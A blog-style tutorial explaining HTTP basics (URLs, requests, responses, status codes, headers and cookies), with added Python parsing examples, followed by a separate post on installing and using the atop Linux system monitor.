    All about HTTP



    What is HTTP(S)?

    What is HTTP? (HyperText Transfer Protocol)

    HTTP is what's used whenever you view a website. It was developed by Tim Berners-Lee and his team between 1989 and 1991. HTTP is the set of rules used for communicating with web servers to transmit webpage data, whether that is HTML, images, videos, etc. Below we look at how you request content from a web server using the HTTP protocol.




    What is HTTPS? (HyperText Transfer Protocol Secure)

    HTTPS is the secure version of HTTP. HTTPS data is encrypted, so it not only stops people from seeing the data you are receiving and sending, but it also gives you assurance that you're talking to the correct web server and not something impersonating it.

    When you access a website, your browser needs to make requests to a web server for assets such as HTML and images, and download the responses. Before that, you need to tell the browser specifically how and where to access these resources; this is where URLs help.



    What is a URL? (Uniform Resource Locator)

    If you've used the internet, you've used a URL before. A URL is predominantly an instruction on how to access a resource on the internet. The breakdown below shows what a URL looks like with all of its features (not every request uses all of them):

    Scheme (http) - This instructs on what protocol to use for accessing the resource, such as HTTP, HTTPS or FTP (File Transfer Protocol).

    User (userNpass) - Some services require authentication to log in; you can put a username and password into the URL to log in.

    Host (hackingtruth.in) - The domain name or IP address of the server you wish to access.

    Port (80) - The port that you are going to connect to, usually 80 for HTTP and 443 for HTTPS, but the service can be hosted on any port between 1 and 65535.

    Path (view-article) - The file name or location of the resource you are trying to access.

    Query String (?id=10) - Extra bits of information that can be sent to the requested path. For example, /blog?id=1 would tell the blog path that you wish to receive the blog article with the id of 1.

    Fragment (#task3) - This is a reference to a location on the actual page requested. It is commonly used for pages with long content so that a certain part of the page can be linked to directly and is viewable to the user as soon as they access the page.
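
    As an added example (not code from the original post), the same breakdown carried out in Python with the standard library's urllib.parse: the URL is assembled from the component values the post lists (the userNpass:secret credentials are a placeholder), split back into those components, and checked for embedded credentials, which otherwise end up in browser history, proxy logs and Referer headers.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed example URL assembled from the components the post lists
# (scheme, user, host, port, path, query string, fragment). The
# credentials are a placeholder, not real ones.
EXAMPLE_URL = "http://userNpass:secret@hackingtruth.in:80/view-article?id=10#task3"

# Default ports for the two schemes the post covers, used when the URL
# carries none.
DEFAULT_PORTS = {"http": 80, "https": 443}


def break_down_url(url):
    """Split a URL into the named parts described in the post.

    urlsplit() performs the RFC 3986 split; the user info and port are
    then read out of the authority and the query string is decoded into
    a dict (single-valued keys are flattened to a plain string).
    """
    parts = urlsplit(url)
    if not parts.scheme or not parts.hostname:
        raise ValueError("URL needs at least a scheme and a host")
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(parts.scheme)
    query = {k: v[0] if len(v) == 1 else v for k, v in parse_qs(parts.query).items()}
    return {
        "scheme": parts.scheme,
        "user": parts.username,
        "password": parts.password,
        "host": parts.hostname,
        "port": port,
        "path": parts.path or "/",
        "query": query,
        "fragment": parts.fragment or None,
    }


def credentials_in_url(url):
    """True when the URL carries a user:password pair. Such URLs leak the
    secret into history, logs and Referer headers, so they are worth
    flagging in code review and in proxy logs."""
    return urlsplit(url).password is not None


if __name__ == "__main__":
    for name, value in break_down_url(EXAMPLE_URL).items():
        print("%-9s %s" % (name, value))
    print("credentials embedded:", credentials_in_url(EXAMPLE_URL))
```

    urlsplit() lower-cases the hostname and leaves the path, query and fragment untouched, which is why the example normalises an empty path to "/" itself: the server sees a request for the root either way.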
    
    

     

     




    Making a Request

    It's possible to make a request to a web server with just one line: "GET / HTTP/1.1".

    But for a much richer web experience, you'll need to send other data as well. This other data is sent in what are called headers, where headers contain extra information to give to the web server you're communicating with, but we'll go more into this in the Header task.

    Example

    GET / HTTP/1.1
    Host: hackingtruth.in
    User-Agent: Mozilla/5.0 Firefox/87.0
    Referer: https://hackingtruth.in/
    

    To break down each line of this request:

    • Line 1: This request is sending the GET method (more on this in the HTTP Methods task), requesting the home page with / and telling the web server we are using HTTP protocol version 1.1.
    • Line 2: We tell the web server we want the website hackingtruth.in.
    • Line 3: We tell the web server we are using the Firefox version 87 browser.
    • Line 4: We tell the web server that the web page that referred us to this one is https://hackingtruth.in.
    • Line 5: HTTP requests always end with a blank line to inform the web server that the request has finished.



     

    Example Response:

    HTTP/1.1 200 OK
    Server: Apache/2.4.46
    Date: Fri, 09 Apr 2021 13:34:03 GMT
    Content-Type: text/html
    Content-Length: 98
    
    <html>
    <head>
        <title>HackingTruth</title>
    </head>
    <body>
        Welcome To HackingTruth.in
    </body>
    </html>

    To break down each line of the response:

    Line 1: HTTP/1.1 is the version of the HTTP protocol the server is using, followed by the HTTP status code, in this case "200 OK", which tells us the request has completed successfully.

    Line 2: This tells us the web server software and version number.

    Line 3: The current date, time and timezone of the web server.

    Line 4: The Content-Type header tells the client what sort of information is going to be sent, such as HTML, images, videos, PDF or XML.

    Line 5: Content-Length tells the client how long the response is; this way we can confirm no data is missing.

    Line 6: The HTTP response contains a blank line to confirm the end of the HTTP response headers.

    Lines 7-14: The information that has been requested, in this instance the homepage.
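
    The request and response shown above, as an added example that is not part of the original post: a small Python parser that splits a raw HTTP/1.1 message into start line, headers and body, checks the body against Content-Length the way a client detects a truncated response, and sorts the status code into its range. The sample messages are constructed here, modelled on the post's examples, with CRLF line endings as on the wire and a Content-Length computed from the actual body.

```python
# Added example, not code from the original post: parse the raw HTTP/1.1
# messages shown above and run the checks a client makes on them.

def parse_http_message(raw):
    """Split a raw HTTP message into (start_line, headers, body).

    Headers end at the first blank line; CRLF is what travels on the
    wire, bare LF is accepted so the post's examples can be pasted in.
    Header names are case-insensitive and are lower-cased as keys.
    """
    for blank in ("\r\n\r\n", "\n\n"):
        head, found, body = raw.partition(blank)
        if found:
            break
    else:
        raise ValueError("message has no blank line terminating the headers")
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon:
            raise ValueError("malformed header line: %r" % line)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_request(raw):
    """Return method, path, version, headers and body of a request."""
    start_line, headers, body = parse_http_message(raw)
    method, path, version = start_line.split(" ")
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def status_class(code):
    """Map a status code to the range the post describes."""
    ranges = {1: "informational", 2: "success", 3: "redirection",
              4: "client error", 5: "server error"}
    return ranges.get(code // 100, "unknown")


def parse_response(raw):
    """Return version, status, reason, headers and body of a response, plus
    'complete': whether the body length matches Content-Length, which is
    how a client notices a connection that dropped mid-body."""
    start_line, headers, body = parse_http_message(raw)
    version, code, reason = start_line.split(" ", 2)
    declared = headers.get("content-length")
    complete = declared is None or int(declared) == len(body.encode())
    return {"version": version, "status": int(code), "reason": reason,
            "status_class": status_class(int(code)),
            "headers": headers, "body": body, "complete": complete}


# Constructed sample messages modelled on the post's examples.
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: hackingtruth.in\r\n"
    "User-Agent: Mozilla/5.0 Firefox/87.0\r\n"
    "Referer: https://hackingtruth.in/\r\n"
    "\r\n"
)

SAMPLE_BODY = "<html><body>Welcome To HackingTruth.in</body></html>"
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.46\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: " + str(len(SAMPLE_BODY.encode())) + "\r\n"
    "\r\n" + SAMPLE_BODY
)

# The same response cut off mid-body, as seen when the connection drops:
# Content-Length no longer matches what arrived.
TRUNCATED_RESPONSE = SAMPLE_RESPONSE[:-10]

if __name__ == "__main__":
    print(parse_request(SAMPLE_REQUEST)["headers"])
    print(parse_response(SAMPLE_RESPONSE)["complete"],
          parse_response(TRUNCATED_RESPONSE)["complete"])
```

    The Content-Length comparison is done on the encoded bytes, not on the character count, because the header counts octets; the two differ as soon as a body contains non-ASCII text.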

     

     

     

     

    HTTP Methods

    HTTP methods are a way for the client to show their intended action when making an HTTP request. There are a lot of HTTP methods, but we'll cover the most common ones; mostly you'll deal with the GET and POST methods.

    GET Request

    This is used for getting information from a web server.

    POST Request

    This is used for submitting data to the web server and potentially creating new records.

    PUT Request

    This is used for submitting data to a web server to update information.

    DELETE Request

    This is used for deleting information/records from a web server.

     

     

    HTTP Status Codes

    In the previous task, you learnt that when an HTTP server responds, the first line always contains a status code informing the client of the outcome of their request and also potentially how to handle it. These status codes can be broken down into 5 different ranges:

    100-199 -- Informational Response: These are sent to tell the client the first part of their request has been accepted and they should continue sending the rest of their request. These codes are no longer very common.

    200-299 -- Success: This range of status codes is used to tell the client their request was successful.

    300-399 -- Redirection: These are used to redirect the client's request to another resource. This can be either to a different webpage or a different website altogether.

    400-499 -- Client Errors: Used to inform the client that there was an error with their request.

    500-599 -- Server Errors: This is reserved for errors happening on the server side and usually indicates quite a major problem with the server handling the request.

    Common HTTP Status Codes:

    There are a lot of different HTTP status codes, and that's not including the fact that applications can even define their own. We'll go over the most common HTTP responses you are likely to come across:

    200 -- OK: The request was completed successfully.

    201 -- Created: A resource has been created (for example a new user or new blog post).

    301 -- Permanent Redirect: This redirects the client's browser to a new webpage or tells search engines that the page has moved somewhere else and to look there instead.

    302 -- Temporary Redirect: Similar to the above permanent redirect, but as the name suggests, this is only a temporary change and it may change again in the near future.

    400 -- Bad Request: This tells the browser that something was either wrong or missing in their request. This could sometimes be used if the web server resource that is being requested expected a certain parameter that the client didn't send.

    401 -- Not Authorised: You are not currently allowed to view this resource until you have authorised with the web application, most commonly with a username and password.

    403 -- Forbidden: You do not have permission to view this resource whether you are logged in or not.

    404 -- Page Not Found: The page/resource you requested does not exist.

    405 -- Method Not Allowed: The resource does not allow this request method; for example, you send a GET request to the resource /create-account when it was expecting a POST request instead.

    500 -- Internal Server Error: The server has encountered some kind of error with your request that it doesn't know how to handle properly.

    503 -- Service Unavailable: This server cannot handle your request as it's either overloaded or down for maintenance.
    
    
    





    Headers

    Headers are additional bits of data you can send to the web server when making requests.

    Although no headers are strictly required when making an HTTP request, without them you'll find it difficult to view a website properly.

    Common Request Headers

    These are headers that are sent from the client (usually your browser) to the server.

    Host: Some web servers host multiple websites, so by providing the Host header you can tell it which one you require; otherwise you'll just receive the default website for the server.

    User-Agent: This is your browser software and version number. Telling the web server your browser software helps it format the website properly for your browser, and also some elements of HTML, JavaScript and CSS are only available in certain browsers.

    Content-Length: When sending data to a web server, such as in a form, the content length tells the web server how much data to expect in the web request. This way the server can ensure it isn't missing any data.

    Accept-Encoding: Tells the web server what types of compression methods the browser supports so the data can be made smaller for transmitting over the internet.

    Cookie: Data sent to the server to help it remember your information (see the Cookies task for more information).

    Common Response Headers

    These are the headers that are returned to the client from the server after a request.

    Set-Cookie: Information to store which gets sent back to the web server on each request (see the Cookies task for more information).

    Cache-Control: How long to store the content of the response in the browser's cache before it requests it again.

    Content-Type: This tells the client what type of data is being returned, i.e. HTML, CSS, JavaScript, images, PDF, video, etc. Using the Content-Type header, the browser then knows how to process the data.

    Content-Encoding: What method has been used to compress the data to make it smaller when sending it over the internet.





    Cookies

    You've probably heard of cookies before; they're just a small piece of data that is stored on your computer. Cookies are saved when you receive a "Set-Cookie" header from a web server. Then on every further request you make, you'll send the cookie data back to the web server. Because HTTP is stateless (it doesn't keep track of your previous requests), cookies can be used to remind the web server who you are, of some personal settings for the website, or whether you've been to the website before. Let's take a look at this as an example HTTP exchange:

    GET / HTTP/1.1           (The client requests the
    Host: cookies.ht           webpage from
    User-Agent: xyxyx          https://cookies.ht)

    HTTP/1.1 200 OK                         (The server responds back with
    Server: Apache/2.4.46                    a simple webpage with a form
    Date: Tue 18 Feb 2021 07:07:19 GMT        asking for the user's name)
    Content-Type: text/html; charset=UTF-8

    POST / HTTP/1.1                                (The client sends back the
    Host: cookies.ht                                form with the name
    User-Agent: xyxyx                                set to atul)
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 9

    name=atul

    HTTP/1.1 200 OK                          (The server responds with a Set-Cookie
    Server: Apache/2.4.46                      header telling the
    Date: Tue 18 Feb 2021 07:07:19 GMT          client to save the data
    Set-Cookie: name=atul                        name=atul)
    Content-Type: text/html; charset=UTF-8

    HTML DATA.........

    GET / HTTP/1.1                         (On the next and every further
    Host: cookies.ht                        request the client sends the
    User-Agent: xyxyx                       cookie data back to the server)
    Cookie: name=atul

    HTTP/1.1 200 OK                        (The server then sees the cookie data and
    Server: Apache/2.4.46                        instead of displaying the form
    Date: Tue 18 Feb 2021 07:07:19 GMT               displays a welcome back message)
    Content-Type: text/html; charset=UTF-8

    Welcome back atul

    Cookies can be used for many purposes but are most commonly used for website authentication. The cookie value won't usually be a clear-text string where you can see the password, but a token (a unique secret code that isn't easily guessable by a human).
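
    The exchange above as a runnable Python model, added here and not part of the original post: a stateless handle() function that hands out the form, sets a cookie on the POST, and greets a returning client that presents it, together with a minimal client that stores Set-Cookie values and replays them as a Cookie header. Following the post's remark that the cookie value is normally a token rather than clear text, the cookie carries a random session token that maps to the name server-side, and it is marked HttpOnly, Secure and SameSite=Lax. SESSIONS, handle, Client and run_exchange are names chosen for this example.

```python
# Added example (not code from the original post): the cookie round trip
# from the post, with a token in the cookie instead of the clear-text name.
import secrets
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

# Constructed server-side store: session token -> user name. Only the
# token travels in the cookie; the name never leaves the server.
SESSIONS = {}


def handle(request):
    """request: dict with method, path, headers (lower-case keys), body.
    Returns dict with status, headers, body. Nothing is remembered between
    calls except SESSIONS; who the client is comes only from the Cookie
    header, which is what HTTP being stateless means in practice."""
    headers = {"Content-Type": "text/html; charset=UTF-8"}
    cookies = SimpleCookie(request["headers"].get("cookie", ""))
    token = cookies["session"].value if "session" in cookies else None

    if token in SESSIONS:                      # returning client
        return {"status": 200, "headers": headers,
                "body": "Welcome back %s" % SESSIONS[token]}

    if request["method"] == "POST":            # the submitted form
        form = parse_qs(request.get("body", ""))
        name = form.get("name", [""])[0]
        if not name:
            return {"status": 400, "headers": headers, "body": "name is required"}
        token = secrets.token_urlsafe(32)      # 256 bits, not guessable
        SESSIONS[token] = name
        jar = SimpleCookie()
        jar["session"] = token
        # HttpOnly keeps page scripts from reading it, Secure restricts it
        # to HTTPS, SameSite=Lax keeps it off cross-site POSTs.
        jar["session"]["httponly"] = True
        jar["session"]["secure"] = True
        jar["session"]["samesite"] = "Lax"
        headers["Set-Cookie"] = jar["session"].OutputString()
        return {"status": 200, "headers": headers, "body": "HTML DATA..."}

    # first visit: no cookie, nothing submitted, so show the form
    return {"status": 200, "headers": headers,
            "body": '<form method="POST"><input name="name"></form>'}


class Client:
    """Minimal browser stand-in: remembers Set-Cookie values and sends
    them back as a Cookie header on every later request."""

    def __init__(self):
        self.jar = SimpleCookie()

    def send(self, method, body=None):
        headers = {"host": "cookies.ht", "user-agent": "xyxyx"}
        if self.jar:
            headers["cookie"] = "; ".join(
                "%s=%s" % (name, morsel.value) for name, morsel in self.jar.items())
        response = handle({"method": method, "path": "/",
                           "headers": headers, "body": body or ""})
        if "Set-Cookie" in response["headers"]:
            self.jar.load(response["headers"]["Set-Cookie"])
        return response


def run_exchange():
    """Replay the exchange from the post; returns the three response bodies."""
    client = Client()
    first = client.send("GET")                 # form
    second = client.send("POST", "name=atul")  # Set-Cookie comes back
    third = client.send("GET")                 # Cookie header replayed
    return first["body"], second["body"], third["body"]


if __name__ == "__main__":
    for body in run_exchange():
        print(body)
```

    A client that presents a made-up session value simply gets the form again: the server only trusts tokens it issued itself, which is the property that makes the token safer to hand out than the name.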



    Viewing Your Cookies

    You can easily view what cookies your browser is sending to a website by using the developer tools in your browser. If you're not sure how to get to the developer tools in your browser, click on the "View Site" button at the top of this task for a how-to guide.

    Once you have developer tools open, click on the "Network" tab. This tab will show you a list of all the





    Disclaimer

    This was written for educational purposes and pentesting only.
    The author will not be responsible for any damage..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal..!

    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about ethical hacking, security, penetration testing and malware analysis. These hacking tutorials are against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

    All tutorials and videos have been made using our own routers, servers, websites and other resources; they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from becoming a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

    - Hacking Truth by Kumar Atul Jaiswal

    I hope you liked this post; then you should not forget to share it.
    Thank you so much :-)

     

     

    atop a CLI monitoring tool for linux

    The atop command gives you a more anatomized view of your server's performance. The program atop is an interactive monitor to view the load on a Linux system. It shows the occupation of the most critical hardware resources (from a performance point of view) on system level, i.e. CPU, memory, disk and network. It also shows which processes are responsible for the indicated load with respect to CPU and memory load on process level. Disk load is shown per process if "storage accounting" is active in the kernel. Network load is shown per process if the kernel module 'netatop' has been installed.

     

     

    Installation






    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ sudo apt-get install atop        
    [sudo] password for hackerboy: 
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following packages were automatically installed and are no longer required:
      libbasicusageenvironment1 libdap25 libgarcon-gtk3-1-0 libgroupsock8 libgtop-2.0-11 libgtop2-common libjsoncpp1 liblivemedia77 libre2-8
      librpm8 librpmbuild8 librpmio8 librpmsign8 libsane libusageenvironment3 libxdo3 libxfce4ui-utils libxpresent1 light-locker
      linux-headers-5.9.0-kali2-amd64 linux-headers-5.9.0-kali2-common linux-image-5.9.0-kali2-amd64 python3-atomicwrites python3-pathtools
      tango-icon-theme x11-session-utils xdotool xfce4-appfinder xfce4-helpers xfce4-panel xfce4-pulseaudio-plugin xfce4-session xfce4-settings
      xfdesktop4 xfdesktop4-data xfwm4 xiccd xinit xorg
    Use 'sudo apt autoremove' to remove them.
    The following NEW packages will be installed:
      atop
    0 upgraded, 1 newly installed, 0 to remove and 137 not upgraded.
    Need to get 201 kB of archives.
    After this operation, 511 kB of additional disk space will be used.
    Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 atop amd64 2.6.0-2 [201 kB]
    Fetched 201 kB in 18s (11.1 kB/s)
    Selecting previously unselected package atop.
    (Reading database ... 407475 files and directories currently installed.)
    Preparing to unpack .../atop_2.6.0-2_amd64.deb ...
    Unpacking atop (2.6.0-2) ...
    Setting up atop (2.6.0-2) ...
    update-rc.d: We have no instructions for the atopacct init script.
    update-rc.d: It looks like a non-network service, we enable it.
    Created symlink /etc/systemd/system/timers.target.wants/atop-rotate.timer → /lib/systemd/system/atop-rotate.timer.
    Created symlink /etc/systemd/system/multi-user.target.wants/atop.service → /lib/systemd/system/atop.service.
    atop-rotate.service is a disabled or a static unit, not starting it.
    atopacct.service is a disabled or a static unit, not starting it.
    Processing triggers for kali-menu (2021.2.0) ...
    Processing triggers for man-db (2.9.4-2) ...
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/pygeoip/GeoOccupy-new]
    └─$ 
    
    
    
    








     

    Every interval (default: 10 seconds) information is shown about the resource occupation on system level (cpu, memory, disks and network layers), followed by a list of processes which have been active during the last interval (note that all processes that were unchanged during the last interval are not shown, unless the key 'a' has been pressed or unless sorting on memory occupation is done). If the list of active processes does not entirely fit on the screen, only the top of the list is shown (sorted in order of activity). The intervals are repeated till the number of samples (specified as command argument) is reached, or till the key 'q' is pressed in interactive mode.

     

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ atop
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ 
    
    
    







     

    When atop is started, it checks whether the standard output channel is connected to a screen, or to a file/pipe. In the first case it produces screen control codes (via the ncurses library) and behaves interactively; in the second case it produces flat ASCII output.

     

     


    ATOP - KumarAtulJaiswal                                       2021/05/13  21:03:18                                       ----------------                                        10s elapsed
    PRC | sys    1.07s | user   4.10s |               | #proc    177 | #trun      2 | #tslpi   565 |               | #tslpu     0 | #zombie    0 | clones     9 |               | no  procacct |
    CPU | sys       9% | user     37% |  irq       0% | idle    354% | wait      0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
    cpu | sys       3% | user      9% |  irq       0% | idle     88% | cpu002 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
    cpu | sys       2% | user     10% |  irq       0% | idle     88% | cpu000 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
    cpu | sys       2% | user      9% |  irq       0% | idle     89% | cpu001 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
    cpu | sys       2% | user      9% |  irq       0% | idle     89% | cpu003 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
    CPL | avg1    0.65 | avg5    0.61 |               | avg15   0.51 |              |              |  csw    27567 | intr   10817 |              |              |  numcpu     4 |              |
    MEM | tot     3.6G | free  125.7M |  cache   1.4G | dirty   0.9M | buff  146.2M | slab  175.2M |  slrec 103.7M | shmem 221.1M | shrss  30.5M | vmbal   0.0M |  zfarc   0.0M | hptot   0.0M |
    SWP | tot     7.5G | free    7.5G |               |              |              | swcac   0.0M |               |              |              | vmcom   4.3G |               | vmlim   9.4G |
    PSI | cpusome   1% | memsome   0% |  memfull   0% | iosome    0% | iofull    0% | cs     1/2/2 |               | ms     0/0/0 | mf     0/0/0 | is     0/0/2 |  if     0/0/1 |              |
    DSK |          sda | busy      1% |  read       0 |              | write      3 | KiB/r      0 |  KiB/w     26 | MBr/s    0.0 | MBw/s    0.0 |              |  avq     1.70 | avio 20.0 ms |
    NET | transport    | tcpi      18 |  tcpo      23 | udpi       2 | udpo       2 | tcpao      2 |  tcppo      0 | tcprs      0 | tcpie      0 | tcpor      0 |  udpnp      0 | udpie      0 |
    NET | network      | ipi       21 |  ipo       26 |              | ipfrw      0 | deliv     21 |               |              |              |              |  icmpi      1 | icmpo      1 |
    NET | usb0    ---- | pcki      21 |  pcko      26 | sp    0 Mbps | si    6 Kbps | so    4 Kbps |  coll       0 | mlti       0 | erri       0 | erro       0 |  drpi       0 | drpo       0 |
    
        PID       SYSCPU       USRCPU       RDELAY         VGROW        RGROW       RUID           EUID            ST       EXC        THR        S       CPUNR        CPU       CMD         1/3
      28734        0.04s        1.64s        0.01s            0K           0K       hackerbo       hackerbo        --         -          7        R           1        17%       qterminal
        846        0.33s        0.76s        0.01s         7052K           0K       root           root            --         -         21        S           0        11%       Xorg
       3478        0.14s        0.32s        0.07s            0K        7708K       hackerbo       hackerbo        --         -         71        S           0         5%       firefox-esr
       3662        0.04s        0.23s        0.03s            0K         192K       hackerbo       hackerbo        --         -         25        S           2         3%       Web Content
       3629        0.05s        0.20s        0.04s            0K         264K       hackerbo       hackerbo        --         -         25        S           2         3%       Web Content
      31181        0.04s        0.20s        0.00s            0K        -620K       hackerbo       hackerbo        --         -         26        S           1         2%       Web Content
       2281        0.05s        0.14s        0.00s            0K           0K       hackerbo       hackerbo        --         -          7        S           0         2%       xfwm4
       3679        0.03s        0.13s        0.00s            0K           0K       hackerbo       hackerbo        --         -         24        S           3         2%       Web Content
       2685        0.03s        0.11s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           1         1%       panel-38-netlo
       2688        0.03s        0.10s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           0         1%       panel-40-cpugr
       3649        0.05s        0.07s        0.01s            0K           0K       hackerbo       hackerbo        --         -         24        S           1         1%       Web Content
      24581        0.11s        0.00s        0.02s            0K           0K       root           root            --         -          1        I           2         1%       kworker/2:0-ev
      32260        0.04s        0.04s        0.00s         4912K        3724K       hackerbo       hackerbo        --         -          1        R           3         1%       atop
       3801        0.00s        0.07s        0.00s            0K         264K       hackerbo       hackerbo        --         -         23        S           1         1%       WebExtensions
       3641        0.02s        0.03s        0.00s            0K           0K       hackerbo       hackerbo        --         -         24        S           0         1%       Web Content
        823        0.00s        0.02s        0.00s            0K           0K       debian-t       debian-t        --         -          1        S           1         0%       tor
       2693        0.01s        0.01s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           0         0%       panel-17-pulse
      32236        0.01s        0.01s        0.00s          132K          28K       root           root            --         -          1        S           1         0%       4nonimizer
       9614        0.01s        0.00s        0.00s            0K           0K       hackerbo       hackerbo        --         -         24        S           0         0%       Web Content
       2511        0.00s        0.01s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           3         0%       xfce4-panel
       2262        0.00s        0.01s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           2         0%       at-spi2-regist
        745        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          4        S           1         0%       rsyslogd
         13        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          1        I           2         0%       rcu_sched
         23        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          1        S           2         0%       ksoftirqd/2
      30029        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          1        I           0         0%       kworker/u8:4-e
      29732        0.00s        0.00s        0.00s            0K           0K       hackerbo       hackerbo        --         -         25        S           1         0%       Web Content
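
    As an added example (not part of the original post or of atop itself): a Python parser for the process table in the screen dump above. The sample rows are copied from that dump; CMD is the last column and can contain a space ("Web Content"), so the parser splits on whitespace at most fourteen times and keeps the remainder. cpu_by_user() reproduces the per-user accumulation atop offers with -u, and privilege_mismatch() lists processes whose real and effective user differ (RUID vs EUID), which is worth a second look when reviewing a server; both function names are chosen for this example.

```python
# Added example, not code from the original post or from atop: parse the
# process table atop prints in interactive mode and summarise it.

# Rows copied from the screen dump above (header included, with the "1/3"
# page marker atop appends to it).
ATOP_SCREEN = """\
    PID       SYSCPU       USRCPU       RDELAY         VGROW        RGROW       RUID           EUID            ST       EXC        THR        S       CPUNR        CPU       CMD         1/3
  28734        0.04s        1.64s        0.01s            0K           0K       hackerbo       hackerbo        --         -          7        R           1        17%       qterminal
    846        0.33s        0.76s        0.01s         7052K           0K       root           root            --         -         21        S           0        11%       Xorg
   3478        0.14s        0.32s        0.07s            0K        7708K       hackerbo       hackerbo        --         -         71        S           0         5%       firefox-esr
   3662        0.04s        0.23s        0.03s            0K         192K       hackerbo       hackerbo        --         -         25        S           2         3%       Web Content
  31181        0.04s        0.20s        0.00s            0K        -620K       hackerbo       hackerbo        --         -         26        S           1         2%       Web Content
  24581        0.11s        0.00s        0.02s            0K           0K       root           root            --         -          1        I           2         1%       kworker/2:0-ev
    823        0.00s        0.02s        0.00s            0K           0K       debian-t       debian-t        --         -          1        S           1         0%       tor
"""

# Column order of atop's default (generic, -g) process view as shown above.
COLUMNS = ["PID", "SYSCPU", "USRCPU", "RDELAY", "VGROW", "RGROW", "RUID",
           "EUID", "ST", "EXC", "THR", "S", "CPUNR", "CPU", "CMD"]


def _seconds(field):
    """'1.64s' -> 1.64"""
    return float(field.rstrip("s"))


def _kib(field):
    """'7052K' -> 7052, '-620K' -> -620"""
    return int(field.rstrip("K"))


def parse_process_table(text):
    """Return one dict per process row with numeric columns converted.

    CMD is the last column and may contain spaces, so each row is split on
    whitespace at most len(COLUMNS)-1 times and the remainder kept as CMD.
    The header row is recognised by its first field and skipped.
    """
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(None, len(COLUMNS) - 1)
        if fields[0] == "PID":
            continue
        if len(fields) != len(COLUMNS):
            raise ValueError("unexpected row: %r" % line)
        row = dict(zip(COLUMNS, fields))
        row["PID"] = int(row["PID"])
        for key in ("SYSCPU", "USRCPU", "RDELAY"):
            row[key] = _seconds(row[key])
        for key in ("VGROW", "RGROW"):
            row[key] = _kib(row[key])
        row["THR"] = int(row["THR"])
        row["CPUNR"] = int(row["CPUNR"])
        row["CPU"] = int(row["CPU"].rstrip("%"))
        row["CMD"] = row["CMD"].strip()
        rows.append(row)
    return rows


def cpu_by_user(rows):
    """Accumulate CPU% per real user, the view atop gives with -u."""
    totals = {}
    for row in rows:
        totals[row["RUID"]] = totals.get(row["RUID"], 0) + row["CPU"]
    return totals


def privilege_mismatch(rows):
    """Processes whose effective user differs from their real user, i.e.
    running with changed privileges (setuid or similar)."""
    return [row for row in rows if row["RUID"] != row["EUID"]]


if __name__ == "__main__":
    table = parse_process_table(ATOP_SCREEN)
    print(cpu_by_user(table))
    print([row["CMD"] for row in privilege_mismatch(table)])
```

    On a real system the same table can be captured with atop's -P flag (listed in the help output below), which emits a parseable form instead of the screen layout; this example sticks to the screen dump because that is what the post shows.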
    
    





     

    Any Help?





    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ atop -h
    Usage: atop [-flags] [interval [samples]]
                    or
    Usage: atop -w  file  [-S] [-a] [interval [samples]]
           atop -r [file] [-b [YYYYMMDD]hhmm] [-e [YYYYMMDD]hhmm] [-flags]
    
            generic flags:
              -V  show version information
              -a  show or log all processes (i.s.o. active processes only)
              -R  calculate proportional set size (PSS) per process
              -W  determine WCHAN (string) per thread
              -P  generate parseable output for specified label(s)
              -L  alternate line length (default 80) in case of non-screen output
              -f  show fixed number of lines with system statistics
              -F  suppress sorting of system resources
              -G  suppress exited processes in output
              -l  show limited number of lines for certain resources
              -y  show threads within process
              -Y  sort threads (when combined with 'y')
              -1  show average-per-second i.s.o. total values
    
              -x  no colors in case of high occupation
              -g  show general process-info (default)
              -m  show memory-related process-info
              -d  show disk-related process-info
              -n  show network-related process-info
              -s  show scheduling-related process-info
              -v  show various process-info (ppid, user/group, date/time)
              -c  show command line per process
              -o  show own defined process-info
              -u  show cumulated process-info per user
              -p  show cumulated process-info per program (i.e. same name)
